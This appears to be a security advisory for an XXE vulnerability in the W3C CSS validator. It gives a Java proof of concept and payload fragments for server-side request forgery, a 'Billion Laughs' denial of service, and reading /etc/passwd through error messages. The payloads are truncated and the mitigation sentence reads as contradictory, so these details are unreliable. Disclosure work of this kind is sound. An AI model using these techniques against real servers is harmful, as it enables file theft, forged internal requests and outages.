# W3C – CSS Validator XXE

## Package

## Affected versions

## Patched versions

## Description

### Summary

All versions of W3C CSS validator are vulnerable to XXE due to unsafe parsing of XML data when untrusted XML data is passed to the `DocumentParser()` constructor and is not properly sanitized.

### Severity

High – An attacker can use specially-crafted XML objects to coerce server-side request forgery (SSRF). On some systems, this vulnerability can be exploited to read arbitrary local files if an attacker has access to exception messages.

### Proof of Concept

The following proof-of-concept sample payload will coerce the W3C Validator to make a server-side request to http://localhost:8080/pwn.xml:

```
]> &xxe;
```

Exploitation can be done using the main method of `css-validator.jar` (download link) or when used as a library, such as in the following proof-of-concept:

```java
import org.w3c.css.css.DocumentParser;
import org.w3c.css.util.ApplContext;

public class CssValidatorApp {
    // Example CSS URL
    private static final String CSS_URL = "http://localhost:8080/file.xml";

    public static void main(String[] args) {
        try {
            ApplContext ac = new ApplContext("en"); // Application context with language
            ac.setCssVersion("css3");               // Set CSS version for validation
            DocumentParser parser = new DocumentParser(ac, CSS_URL);
        } catch (Exception e) {
            System.err.println("Error parsing CSS: " + e.getMessage());
        }
    }
}
```

The following “Billion Laughs” payload can be used to create denial-of-service conditions:

```
]> &lol9;
```

LFI can be performed if the attacker has access to error messages or stack traces produced by the tool. The following payload will produce the output of `/etc/passwd` in the error message if the user has GNOME installed in the default configuration:

```
"> %eval; %error; '> %local_dtd; ]>
```

Additional research is necessary to determine if LFI techniques can be universalized and combined with SSRF to enable data exfiltration without access to exception messages.

### Further Analysis

This functionality is provided as a service on the W3C website. The vulnerability can be mitigated by uncommenting the lines that enable external entities and DTD validation.

### Timeline

**Date reported**: 01/08/2025

**Date fixed**: 02/28/2025

**Date disclosed**: 03/28/2025
